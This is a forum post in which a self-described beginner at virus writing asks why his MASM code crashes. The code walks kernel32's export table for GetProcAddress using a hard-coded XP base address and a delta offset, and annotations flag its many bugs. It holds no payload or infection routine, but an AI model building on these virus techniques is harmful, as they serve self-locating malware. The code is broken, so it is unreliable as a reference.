man, I read the articles and found out how to get the kernel32
base address with the hard-coded method, and I did a GetProcAddress
search. But the problem is that I get an exception. Why is
that?
my code is this .
First I wrote the code, but the variables in the code segment are
read-only, so I changed that segment's attributes and tried again.
Then, while debugging in OllyDbg, it fails when it scans
the 2Dh element of the export table of kernel32.dll. What a fuck
is this? Please help me man please ... Please ... I'm very curious
now. I just can't breathe without assembly now. Please man help me,
give me some drugs.
This is my source code .
------------------------------------------------code begins ------
.586                                    ; MASM, Intel syntax, 32-bit flat model
.model flat , stdcall
option casemap : none
; Host-side imports: the `invoke ExitProcess` at the end of `start` is resolved
; through this EXE's own import table, not through the manual export-table
; lookup done in GetApiAddress.
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.code
;-----------------------------------------------------------------------
; Entry point.  Register roles for the whole file:
;   ebp = runtime address of `start` (delta offset); every variable is
;         addressed as [ebp + (OFFSET var - OFFSET start)]
;   eax = assumed kernel32 image base (XPKernel32BaseAddress)
; The base is a build-specific constant: on any Windows version where
; kernel32 is not mapped at 77E60000h (and under ASLR) the 'MZ' check
; in CheckForK32 reads some other page or an unmapped one.
;-----------------------------------------------------------------------
start:
call GetDelta                           ; pushes the address of GetDelta ...
GetDelta:
pop ebp                                 ; ... popped here: ebp = &GetDelta at runtime
sub ebp , OFFSET GetDelta - OFFSET start ; ebp = runtime address of `start`
XPKernel32BaseAddress equ 77E60000h     ; hard-coded kernel32 base (named for XP)
mov eax , XPKernel32BaseAddress
call CheckForK32                        ; eax = 0 when 'MZ' and 'PE' are found at the base
cmp eax , 0000000h
jne ExitLoop                            ; never taken: CheckForK32 has no ret on its NotFound path
mov eax , XPKernel32BaseAddress
call GetApiAddress                      ; walks the export name table; result stored in aGetProcAddress
;; now we are going to print a messageBox (not done here: the process just exits)
invoke ExitProcess , 0                  ; resolved via this EXE's import table, not the lookup above
ExitLoop:
;; return to the host code in our virus .
;; NOTE: no instruction follows this label, so anything reaching ExitLoop
;; (the `je ExitLoop` inside GetApiAddress) falls through into the first
;; instruction of CheckForK32 with GetApiAddress's return address still on the stack.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;-----------------------------------------------------------------------
; CheckForK32 — test whether eax points at a loaded PE image.
; In:    eax = candidate image base
; Out:   eax = 0 when both the 'MZ' and 'PE' signatures are present
; Clobb: eax, flags
; The NotFound path has no ret: a failed check falls off the end of the
; proc into the data words declared after it, so the caller's
; `jne ExitLoop` never sees a nonzero eax.
;-----------------------------------------------------------------------
CheckForK32 proc
cmp word ptr [ eax ] , 'ZM'             ; DOS header signature "MZ" (little-endian word)
jne NotFound
add eax , 3ch                           ; e_lfanew: dword at DOS header + 3Ch
mov eax , [eax]
add eax , XPKernel32BaseAddress         ; RVA -> VA with the hard-coded base (eax's input value is gone by now)
cmp word ptr [ eax ] , 'EP'             ; first two bytes of the "PE\0\0" signature
jne NotFound
xor eax , eax                           ; success
ret
NotFound:
;; die  -- no code here: execution continues past `endp` into the data below
CheckForK32 endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Variables live in .code and are reached via [ebp + (OFFSET x - OFFSET start)];
;; that section is read-only by default, hence the author's note about changing
;; segment attributes.  All values below are written by GetApiAddress.
aPEHelder dd 0                          ; VA of the PE header (written twice: RVA first, then VA)
aimportDir dd 0                         ; VA read via PE+78h: DataDirectory[0], the EXPORT directory, despite the name
aAddressTable dd 0                      ; VA from export directory +1Ch (AddressOfFunctions)
aNameTable dd 0                         ; VA from export directory +20h (AddressOfNames)
aOrdinalTable dd 0                      ; VA from export directory +24h (AddressOfNameOrdinals); stored, never read
nOfExports dd 0                         ; dword at export directory +18h (NumberOfNames); loop bound in ecx
sGetProcAddress db 'GetProcAddress' ,0  ; name searched for in the name table
aGetProcAddress dd 0                    ; dword copied out of the address table at GotIt (no base added to it)
;-----------------------------------------------------------------------
; GetApiAddress — walk kernel32's export name table for "GetProcAddress".
; In:    eax = kernel32 image base (read once for e_lfanew; every RVA->VA
;              step below adds the constant XPKernel32BaseAddress instead)
;        ebp = runtime address of `start`
; Out:   eax = 0, edx = 0 on a match; the dword found is stored in
;        aGetProcAddress.  When the bound is hit the code jumps to the
;        caller's ExitLoop label instead of returning, leaving this
;        proc's return address on the stack.
; Clobb: eax, ebx, ecx, edx, esi, edi, flags (nothing is preserved)
; Register roles in the search loop:
;   ecx = number of names (export directory +18h)
;   edx = running index, incremented once per name visited
;   ebx = address of sGetProcAddress; esi = cursor into it
;   eax = cursor into the name-pointer table; edi = cursor into the
;         exported name currently being compared
;-----------------------------------------------------------------------
GetApiAddress proc
;; oky now we have to get the PE real address
mov eax , [eax+3ch]                     ; e_lfanew (RVA of the PE header)
mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
add eax , XPKernel32BaseAddress         ; PE header VA (overwrites the RVA stored just above)
mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
;; now there is PE helder address in the eax
;; we shall play with it .
;; Then we need is the place where VA of import dir is kept
;; it is on the 78h  -- PE+78h is DataDirectory[0] of a PE32 optional header,
;; i.e. the EXPORT directory RVA; the +18h/+1Ch/+20h/+24h reads below are
;; export-directory fields, so "import" in the names is a misnomer.
add eax , 78h
mov eax,dword ptr [ eax ]
add eax , XPKernel32BaseAddress
push eax                                ; keep the export directory VA across each field lookup
mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
;;oky we are pointed to the import table in eax
;; oky then get the addresstableRVA
add eax , 1ch                           ; +1Ch = AddressOfFunctions RVA
mov eax , [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
pop eax
;; oky now we shoud have the Name PTR table
push eax
add eax , 20h                           ; +20h = AddressOfNames RVA
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
pop eax
push eax
;;Now we should get the Ordinal table
add eax , 24h                           ; +24h = AddressOfNameOrdinals RVA (stored, never read again)
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
eax
pop eax
push eax
;; now we have to get nunber of exports
add eax , 18h                           ; +18h = NumberOfNames
mov eax , dword ptr [eax]
mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
mov ecx , eax                           ; ecx = loop bound
pop eax
;; Now we have to search for the APIs , Lets go
;; we shoud put the nOfExports to the ecx oky
;; virus leavaman sanaseama laba! .
mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
;; now the eax is pointed to the first address of the string name
mov edx , 0
lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
mov ebx , esi                           ; ebx keeps the start of the search string
CheckNext:
;; eax is advanced by edx*4 from its CURRENT value rather than from the
;; table base, so the distance between visited entries grows every pass
;; (entry 0, then +4, then +8 more, +12 more, ...).
push edx
shl edx , 2
add eax , edx
pop edx
mov edi , dword ptr [ eax ]             ; name RVA
add edi , XPKernel32BaseAddress         ; name VA
inc edx                                 ; edx = index+1 from here on
mov esi , ebx                           ; restart the search string
CheckByte:
;; we have to compare the bytes in EDI with ESI
cmpsb                                   ; compares [esi] with [edi], advances both
jne CheckNext                           ; mismatch: next name (edx is not checked against ecx on this path)
cmp byte ptr [esi] , 0                  ; search string exhausted => match (the export's own terminator is never compared, so a longer name with this prefix also matches)
je GotIt
cmp edx , ecx                           ; bound check runs once per matching byte, not once per name
je ExitLoop ;; what a shitt this is not kernel32 what a fuck .
jmp CheckByte
GotIt:
;; oky we now get that shitt . Oky now we have to store this shitt
;; its on the count of edx +1
;; but in the loop it was already incremented . This is where aAddressTable was need
mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
mov eax , [eax]                         ; loads the FIRST dword of the address table, then indexes from that value
push edx
shl edx , 2
add eax , edx                           ; edx still holds index+1 here
pop edx
mov eax , [eax]
mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax   ; stored as read: no base added, ordinal table not consulted
xor eax , eax
xor edx , edx
ret
GetApiAddress endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
end start
--------------------------------------------------------------------
Please make sure to change the attributes on the segments to full
access in order to avoid memory access violations under OllyDbg.
Okay man, please help me. I'm just a beginner at assembly
language and virus writing. I need to go to hell.
by : sanzilla jackcat
sandundhammikaperera@...